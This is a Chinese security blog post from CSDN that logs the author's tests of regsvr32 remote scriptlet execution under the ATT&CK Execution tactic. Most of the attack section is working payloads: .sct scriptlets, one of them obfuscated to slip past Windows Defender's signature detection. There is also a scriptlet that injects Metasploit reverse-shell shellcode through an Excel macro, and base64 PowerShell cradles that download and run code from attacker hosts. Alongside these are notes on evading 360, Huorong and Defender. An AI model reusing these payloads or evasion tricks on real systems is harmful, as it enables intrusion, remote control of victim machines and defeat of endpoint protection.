att&ck-Execution

最新推荐文章于 2022-10-15 19:38:38 发布
最新推荐文章于 2022-10-15 19:38:38 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xmd213131/article/details/112759856
版权

文章目录

regsvr32

1.远程加载sct文件执行命令

该手段的作用在于AWL(APPLICATION WHITELISTING,微软应用白名单策略:https://www.4hou.com/posts/4960)绕过,在windows10上绕过applocker这个东西不起作用了。。。。。

老外做的测试: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
1)sct文件的内容应该是类似于下面这种,文件后缀不一定是sct,但是文件的内容要是xml的格式.

<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
    ]]>
</script>
</registration>
</scriptlet>

2)命令:regsvr32 /s /n /u /i:http://192.168.2.124:8888/1.sct scrobj.dll

​ (1).执行系统命令

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>
	<script language="JScript">
		<![CDATA[
	
			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
	
		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>

</scriptlet>

补充:
看到鸿鹄实验室发的文章,发现windows10绕过defender还是可以用的,但是applocker是直接对scrobj.dll进行的限制,所以好像还是不行。。。。

这个class id 如果用上面这个是会被杀的。。。
在这里插入图片描述

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}"
	>
	<script language="JScript">
		<![CDATA[
			var test = "WScript.Shell";
			var f = "calc";
			f.concat(".","e","x","e");
			var r = new ActiveXObject(test).Run(f);
	
		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>

</scriptlet>

使用wireshark抓取请求的数据包发现,在使用过远程加载sct的方式一次后,再次请求会直接加载缓存中的文件,但是通过检索.SCT又找不到该文件的位置,这就很离谱,但是可以确定的是肯定落地了,还可以通过安全日志查到

在这里插入图片描述

​ (2).使用msf生成的反弹shell上线(使用msf生成的vba代码中的数组替换下面的代码中的数组)失败

​ 注意事项:
1.在win7+office 2010测试
2.msf生成的payload为32位原始payload,x64或混淆了均弹不回来

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="CalcShellcode"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- Orginal Shellcode Example : https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/ -->
	<script language="JScript">
		<![CDATA[
	
			var objExcel = new ActiveXObject("Excel.Application");
			objExcel.Visible = false;
			var WshShell = new ActiveXObject("WScript.Shell");
			var Application_Version = objExcel.Version;//Auto-Detect Version
			var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
			WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
			var objWorkbook = objExcel.Workbooks.Add();
			var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
			strCode = '#If Vba7 Then\n'
			strCode += 'Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr\n'
			strCode += 'Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr\n'
			strCode += 'Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr\n'
			strCode += '#Else\n'
			strCode += 'Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long\n'
			strCode += 'Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long\n'
			strCode += 'Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long\n'
			strCode += '#EndIf\n'
			strCode += '\n'
			strCode += 'Sub ExecShell()\n'
			strCode += '        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long\n'
			strCode += '#If Vba7 Then\n'
			strCode += '        Dim  Xlbufvetp As LongPtr\n'
			strCode += '#Else\n'
			strCode += '        Dim  Xlbufvetp As Long\n'
			strCode += '#EndIf\n'
			strCode += 'Hyeyhafxp = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20,139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1,199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81,139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193, _\n'
			strCode += '207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,51,50,0,0,104,119,115,50,95,84,104,76,119,38,7,137,232,255,208,184,144,1,0, _\n'
			strCode += '0,41,196,84,80,104,41,128,107,0,255,213,106,10,104,192,168,2,124,104,2,0,17,92,137,230,80,80,80,80,64,80,64,80,104,234,15,223,224,255,213,151,106,16,86,87,104,153,165,116,97,255,213,133,192,116,10,255,78,8,117,236,232,103,0,0,0,106,0,106,4,86,87,104,2,217,200,95,255,213, _\n'
			strCode += '131,248,0,126,54,139,54,106,64,104,0,16,0,0,86,106,0,104,88,164,83,229,255,213,147,83,106,0,86,83,87,104,2,217,200,95,255,213,131,248,0,125,40,88,104,0,64,0,0,106,0,80,104,11,47,15,48,255,213,87,104,117,110,77,97,255,213,94,94,255,12,36,15,133,112,255,255,255,233,155, _\n'
			strCode += '255,255,255,1,195,41,198,117,193,195,187,240,181,162,86,106,0,83,255,213)\n'
			strCode += '        Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)\n'
			strCode += '        For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)\n'
			strCode += '                Wyzayxya = Hyeyhafxp(Zolde)\n'
			strCode += '                Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)\n'
			strCode += '        Next Zolde\n'
			strCode += '        Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)\n'
			strCode += 'End Sub\n'
			xlmodule.CodeModule.AddFromString(strCode);
			objExcel.Run("ExecShell");
			objExcel.DisplayAlerts = false;
			objWorkbook.Close(false);
	
		]]>
</script>
</registration>
</scriptlet>

其利用了excel宏vba的方式加载shellcode,经过测试直接将msf生成的vba代码写入excel宏中能够执行成功,但是通过远程加载sct文件的方式就有问题,是这代码有问题吗。。。。代码参考的这个老哥的:[添加链接描述](https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba)
在这里插入图片描述
上线就死,估计是这种方式执行完就自己杀掉了线程?不懂啊

(3).使用powershell上线

首先使用msf生成powershell攻击代码:

powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAHcALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJAB3AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAMwAuADUANAA6ADgAOAA4ADgALwA3AHcAeAB1AHAANwBrAHAAYgB2AG4AQwBEAC8AdgBlAGcAcgBMAGIAOQBEAG4AdgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAMwAuADUANAA6ADgAOAA4ADgALwA3AHcAeAB1AHAANwBrAHAAYgB2AG4AQwBEACcAKQApADsA

1.当目标机器安装了360的情况下,不管脚本中是不是执行的powershell命令,都会被拦截:
在这里插入图片描述

2.使用火绒的情况,提示隐藏执行powershell:

在这里插入图片描述
那么将msf生成的powershell再base64一下看看,powershell的base64中间好像是插入的什么字符的,用在线base64编码后是无法运行的,因此先用powershell对要执行的命令base64一下(注意):

$string = '要编码的内容'

function ConvertTo-Base64String([string]$string)
{
    $byteArray = [System.Text.UnicodeEncoding]::Unicode.GetBytes($string)
    [Convert]::ToBase64String( $byteArray )
}

ConvertTo-Base64String($string)

还是会拦截的:
在这里插入图片描述
3.当启用windows defender的情况

defender对.SCT查杀是非常严格的,当我们使用最普通的脚本时:
在这里插入图片描述
马上就被杀了:
在这里插入图片描述
做一下混淆:

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}"
	>
	<script language="JScript">
		<![CDATA[
var a = "po";
      var b = a.concat("w","e","r","s","h","e","l","l");
      var c = b.concat(".","e","x","e");
      var d = "WS";
      var e = "cript";
      var h = ".";
      var i = "S";
      var j = "hell";
      var test = d+e+h+i+j;
      var foo = new ActiveXObject(test).Run(c+" -Ex Bypass"+" -en"+"c cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADMALgAxADkAOAA6ADgAMAAvAGEAJwApACkAIgA="); 
		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>

</scriptlet>

绕过了静态查杀:
在这里插入图片描述
但是下载的马被defender杀了。。。。:
在这里插入图片描述

「已注销」
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ATT&CK-Execution
Mccc_li的博客
09-18 454
文章目录Command and Scripting InterpreterT1059.001 PowerShell基础命令PowerSploitnon-powershellPowerLinePowerShdllNopowershellSyncAppvPublishingServer调用MSBuild.exe调用cscriptT1059.003 Windows Command Shellcmd /cT1059.005 Visual BasicT1059.006 PythonT1059.007 JavaScri
ATT&CK v10版本战术实战研究—持久化(一)
最新发布
ducc20180301的博客
03-03 451
文的主要内容是介绍 APT 攻击者在 Windows 系统下持久运行恶意代码的常用手段,其中的原理是什么,是怎样实现的,安全运维人员如何及时发现,我们应该从哪些方面预防和检测。
ATT & CK 阶段之 Execution -- CMSTP
sojrs_sec的博客
05-09 1561
前言 ATT&CK 阶段之Executon即执行:当黑客入侵成功之后,往往会通过一系列的命令去获取信息、创建持续性会话。本文主要讲解通过cmstp.exe命令执行,调用恶意的dll或者com脚本(sct)。这种方式可以绕过applocker或者其他白名单的防御方式以及UAC. cmstp基本命令使用 cmstp.exe /s /ns C:\Users\ADMINI~W\AppData\Local\Temp\XKNqbpzl.txt 在cmd中执行cmstp.exe -h 安装配置 cmstp.e
ATT & CK 阶段之Execution -- WMI
sojrs_sec的博客
05-09 643
WMI简介 Windows Management Instrumentation:是Windows管理功能,主要是为本地和远程访问Windows系统组件提供环境。依靠于Wmi服务进行本地或远程访问,同时需要SMB及RPCS(135端口)进行远程访问。攻击者通过WMI可以进行远程交互,用于后续渗透的信息收集或远程执行命令。 缓解措施 特权账号管理,防止系统账号和特权账号凭证相同 用户账号管理:默认只有管理员账号才可以通过WMI远程连接。可严格控制所有用户无法通过WMI远程连接 检测方式 网络监控:监控使
渗透测试-window反弹shell
lza20001103的博客
05-11 4581
window反弹shell
偶遇的webshell,那得冲一波
sievr的博客
07-16 5万+
今天偶遇一个webshell,事件起因是这样的 然后通过交谈,我发现了个webshell 界面不错呀,那得冲他。 找这个群友要了波密码,登录上去拿到这个webshell的源代码 呃,你跟我认真的?这种webshell我已经是见过第二次了 或许单纯无聊,或许因为界面霸气的确想要源代码 一通解密下来,然后就变成了这样 我去,这么点代码能支持一个webshell运行?跟我开玩笑呢 但里面有个链接,通过代码得知是引用的这个文件,那就去看他一波 然后脸是打的啪啪响 既然web访问不了,那就wget下载下来看
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
ATT&CK手册.pdf
09-20
本手册涉及的核心概念是ATT&CK模型,这是一种由MITRE Corporation开发的攻击框架,用于对攻击者在渗透和入侵过程中使用的手法、技术和程序进行分类和描述。ATT&CK手册将网络安全的视角从防御转向了攻击者的行为,为...
ATT&CK手册.docx
09-20
### ATT&CK手册知识点概述 #### 一、Initial Access(初始访问) **初始访问**是攻击链中的第一个步骤,指的是攻击者如何首次进入目标网络。这部分着重介绍了两种常见且有效的攻击手段:水坑攻击和利用PHPStudy...
powershell脚本执行绕过powershell下脚本执行限制(cmd下执行)以及在cmd下隐藏脚本窗口...
WY92139010的博客
02-27 1269
powershell脚本执行绕过powershell下脚本执行限制(cmd下执行) powershell脚本运行方式有两种,一种是powshell中运行,另一种是在cmd中(在某些情况下相当有用) powershell一般默认是禁止脚本运行,想要修改允许脚本运行,需要以管理员权限运行powershell,但有时候我们没有管理员权限,只有普通用户权限,这样就没有办法设置允许脚本运行,...
HTTPS工作原理
qq_42768827的博客
10-15 3251
HTTPS
ATT&ck 命令执行 —— 远程动态数据交换
战神/calmness的博客
03-06 1691
ATT&ck命令执行 —— 远程动态数据交换
利用DCOM实现远程命令执行
热门推荐
Shanfenglan's blog
11-17 9万+
CATALOG1.前言2.实现过程2.1通过DCOM在本机执行命令2.2通过DCOM控制远程主机执行命令3.参考文章 1.前言 实现命令执行的方式之前我写过文章来总结,前两天又发现了一个新方法DCOM,于是有了这篇文章。 2.实现过程 2.1通过DCOM在本机执行命令 实现条件: 管理员权限的powershell 查找DCOM组件MMC Application Class如下图,命令为 Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplic
signature=a3f2e15a5fd7c6b48a95441dea30fd72,encrypt-loader/yarn.lock at d37a49a9eed37443cd4c87c9e5847...
weixin_39980184的博客
05-30 2万+
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/cli@^7.2.3":version "7.2.3"resolved "http://npm.zymreal.com/@babel%2fcli/-/cli-7.2.3.tgz#1b262e42a3e959d28ab3d...
signature=a77ab60446c2be877535a2f8b191e6ff,quality-web/yarn.lock at master · MrJxySteven/quality-web...
weixin_39957647的博客
05-30 2万+
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/code-frame@^7.0.0":version "7.0.0"resolved "https://registry.npm.taobao.org/@babel/code-frame/download/@babel/...
signature=89d8cb77d40ef7009801ee360d53df2b,恶意软件分析 & URL链接扫描 免费在线病毒分析平台 | 魔盾安全分析...
weixin_39954698的博客
05-29 6万+
AndroidManifest.xml32:j93(F'wMETA-INF/CERT.RSA3hbMETA-INF/CERT.SF(":^B\&nqwf5p5: GU:9^C=mTieryZUl6oY>':piAKiPF,ya;bTG)X4AAHtJwOVw$^1VPC_L-9]N(>4txB/E0i\{d3OJ'MT-2\O0u:%;ow5g%qLHUvy%{v=^f|,|-...
signature=88f7bd40b4fbd5ecc3094c94826e8450,恶意软件分析 & URL链接扫描 免费在线病毒分析平台 | 魔盾安全分析...
weixin_39729840的博客
05-29 2万+
3[07 /qAndroidManifest.xmlWBL]gEp=_mH4cmW+MR5Gm%QS~eLj>LNax=J1k{-fm/UU-]-:yanv9"4AH5c6uA-*O%(GP-BvMJ#b%V=us$!K$%0>aCS54M;}]GUUF$S&"9$LTUEVd\Q.XU+yIyl>TTU%;.S,*]DOfLYf2Gfp);)o)G_!KfB'Cg6h$...
工作组下的横向移动-完全初学者指南
Mccc_li的博客
11-14 1690
文章目录一.测试环境二.横向手法1.系统漏洞类(1).ms17-0102.凭据类(1).使用IPC$进行横向移动1)前提条件:2)攻击手法: 一.测试环境 win7(192.168.100.132)->winserver2016(192.168.100.136) 注意:所有的手法均在没有开启任何防护软件的情况下进行的! 二.横向手法 1.系统漏洞类 (1).ms17-010 2.凭据类 (1).使用IPC$进行横向移动 1)前提条件: 1.对方主机开启admin$和c$等默认共享,通过ipc$连接可以
php文件管理
weixin_33947521的博客
04-21 6万+
<html> <head> <title> java </title> </head> <body> <style type="text/css"> body{ background: #E4E4E4; color: #666666; font-...
构建与运营企业内部ATT&CK框架
"本文档主要讨论了如何在企业内部建立和运营ATT&CK框架,以及其更新和路线图。ATT&CK是由MITRE创建的一种基于已知攻击技术的知识库,旨在帮助组织理解和防御高级持续性威胁(APT)的攻击手法。文档提到了ATT&CK的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值